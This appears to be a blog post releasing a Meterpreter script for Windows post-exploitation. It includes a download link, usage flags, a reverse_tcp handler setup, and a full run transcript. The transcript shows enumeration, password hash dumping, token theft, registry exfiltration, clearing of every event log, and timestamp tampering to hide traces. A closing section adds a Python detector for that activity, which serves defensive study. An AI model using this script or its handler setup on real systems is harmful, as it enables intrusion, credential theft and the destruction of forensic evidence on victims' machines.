Finally got the script to work with AutoRunScript in Meterpreter, plus added automatic process migration for client-side exploits where the program holding the Meterpreter session is closed.
http://www.darkoperator.com/winenum.tar.gz
meterpreter > run winenum -h
Windows Local Enumerion Meterpreter Script by Darkoperator
Carlos Perez carlos_perez@darkoperator.com
Usage:
-h This help message.
-m Migrates the Meterpreter Session from it current process to a new one
-c Changes Access Time, Modified Time and Created Time of executables
that where run on the target machine and clear the EventLog
-r Dumps, compresses and download entire Registry
resource> use exploit/multi/handler
resource> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource> set LHOST 192.168.1.108
LHOST => 192.168.1.108
resource> set LPORT 4444
LPORT => 4444
resource> set AutoRunScript /msf3/scripts/meterpreter/winenumng.rb -r -m -c
AutoRunScript => /msf3/scripts/meterpreter/winenumng.rb -r -m -c
resource> exploit
[*] Handler binding to LHOST 192.168.1.108
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Launching hidden cmd.exe...
[*] Process 3672 created.
[*] Current process is grinder.exe (1988). Migrating to 3672.
[*] Migration completed successfully.
[*] New server process: cmd.exe (3672)
[*] Running Windows Local Enumerion Meterpreter Script by Darkoperator
[*] New session on 192.168.1.147:1079...
[*] Saving report to /tmp/192.168.1.147_20081222.441181627
[*] Checking if WIN2K301 is a Virtual Machine ........
[*] This is a VMware Workstation/Fusion Virtual Machine
[*] This is a VMWare virtual Machine
[*] Running Command List ...
[*] running command cmd.exe /c set
[*] running command arp -a
[*] running command ipconfig /all
[*] running command ipconfig /displaydns
[*] running command route print
[*] running command net view
[*] running command netstat -na
[*] running command netstat -ns
[*] running command net share
[*] running command net group
[*] running command net user
[*] running command net localgroup
[*] running command net view /domain
[*] running command netsh firewall show config
[*] running command tasklist /svc
[*] Running WMIC Commands ....
[*] running command wimic computersystem list
[*] running command wimic useraccount list
[*] running command wimic group
[*] running command wimic service list brief
[*] running command wimic volume list brief
[*] running command wimic process list brief
[*] running command wimic startup list full
[*] running command wimic qfe
[*] Dumping password hashes...
[*] Hashes Dumped
[*] Getting Tokens...
[*] All tokens have been processed
[*] Dumping and Downloading the Registry
[*] Exporting HKCU
[*] Compressing HKCU into cab file for faster download
[*] Exporting HKLM
[*] Compressing HKLM into cab file for faster download
[*] Exporting HKCC
[*] Compressing HKCC into cab file for faster download
[*] Exporting HKCR
[*] Compressing HKCR into cab file for faster download
[*] Exporting HKU
[*] Compressing HKU into cab file for faster download
[*] Downloading HKCU.cab to -> /tmp/192.168.1.147-HKCU.cab
[*] Downloading HKLM.cab to -> /tmp/192.168.1.147-HKLM.cab
[*] Downloading HKCC.cab to -> /tmp/192.168.1.147-HKCC.cab
[*] Downloading HKCR.cab to -> /tmp/192.168.1.147-HKCR.cab
[*] Downloading HKU.cab to -> /tmp/192.168.1.147-HKU.cab
[*] Deleting left over files
[*] Clearing Event Logs, this will leave and event 517
[*] Clearing the security Event Log
[*] Clearing the system Event Log
[*] Clearing the application Event Log
[*] Clearing the directory service Event Log
[*] Clearing the dns server Event Log
[*] Clearing the file replication service Event Log
[*] Alll Event Logs have been cleared
[*] Changing Access Time, Modified Time and Created Time of Files Used
[*] Changing file MACE attributes on C:\WINDOWS\system32\cmd.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\reg.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\ipconfig.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\route.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\net.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\netstat.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\netsh.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\makecab.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\tasklist.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\wbem\wmic.exe
[*] Done!
[*] Meterpreter session 1 opened (192.168.1.108:4444 -> 192.168.1.147:1079)
meterpreter >
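Seen from the defender's side, the transcript above is a compact signature: a burst of enumeration binaries (net, netstat, ipconfig, wmic, ...) spawned from a single parent, here the hidden cmd.exe the session migrated into, followed by a security-log clear (event 517). The detector below is an added example, not part of the script or the original post; it runs that logic over constructed process-creation and security log lines, and the pipe-delimited format, thresholds and host names are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta
# Binaries the transcript shows the script driving from its hidden cmd.exe.
ENUM_IMAGES = {"arp.exe", "ipconfig.exe", "route.exe", "net.exe", "netstat.exe",
               "netsh.exe", "tasklist.exe", "wmic.exe", "reg.exe", "makecab.exe"}
BURST_COUNT, BURST_WINDOW = 6, timedelta(seconds=60)       # assumed thresholds
CLEAR_EVENT_ID, CLEAR_WINDOW = 517, timedelta(minutes=10)  # 517 as in the transcript
# Constructed sample logs (not real captures); parent 3672 mirrors the migrated cmd.exe.
PROCESS_LOG = """\
2008-12-22T10:00:05|WIN2K301|3672|arp.exe
2008-12-22T10:00:06|WIN2K301|3672|ipconfig.exe
2008-12-22T10:00:07|WIN2K301|3672|route.exe
2008-12-22T10:00:08|WIN2K301|3672|net.exe
2008-12-22T10:00:09|WIN2K301|3672|netstat.exe
2008-12-22T10:00:10|WIN2K301|3672|netsh.exe
2008-12-22T10:00:11|WIN2K301|3672|tasklist.exe
2008-12-22T10:00:12|WIN2K301|3672|wmic.exe
2008-12-22T11:30:00|WIN2K301|1204|ipconfig.exe
"""
SECURITY_LOG = "2008-12-22T10:01:40|WIN2K301|517|The audit log was cleared\n"

def parse(text):
    """Split 'ts|host|a|b' lines into (datetime, host, a, b) tuples."""
    return [(datetime.fromisoformat(ts), host, a, b)
            for ts, host, a, b in (ln.split("|", 3) for ln in text.splitlines())]

def enum_bursts(process_rows):
    """Parents spawning >= BURST_COUNT distinct enumeration binaries inside BURST_WINDOW."""
    by_parent = defaultdict(list)
    for ts, host, ppid, image in process_rows:
        if image.lower() in ENUM_IMAGES:
            by_parent[(host, int(ppid))].append((ts, image.lower()))
    bursts = []
    for (host, ppid), evs in by_parent.items():
        evs.sort()                       # sliding window over this parent's spawns
        for i, (start, _) in enumerate(evs):
            seen = {img for ts, img in evs[i:] if ts - start <= BURST_WINDOW}
            if len(seen) >= BURST_COUNT:
                bursts.append((host, ppid, start))
                break
    return bursts

def correlate(process_text=PROCESS_LOG, security_text=SECURITY_LOG):
    """One alert per burst, noting whether a log-clear event followed on that host."""
    clears = [(ts, h) for ts, h, eid, _ in parse(security_text) if int(eid) == CLEAR_EVENT_ID]
    return [{"host": host, "ppid": ppid,
             "log_cleared": any(h == host and timedelta(0) <= ts - start <= CLEAR_WINDOW
                                for ts, h in clears)}
            for host, ppid, start in enum_bursts(parse(process_text))]
```

The timestomping step of the script (MACE changes on the binaries it used) does not alter process-creation records, so this kind of log-based correlation survives it.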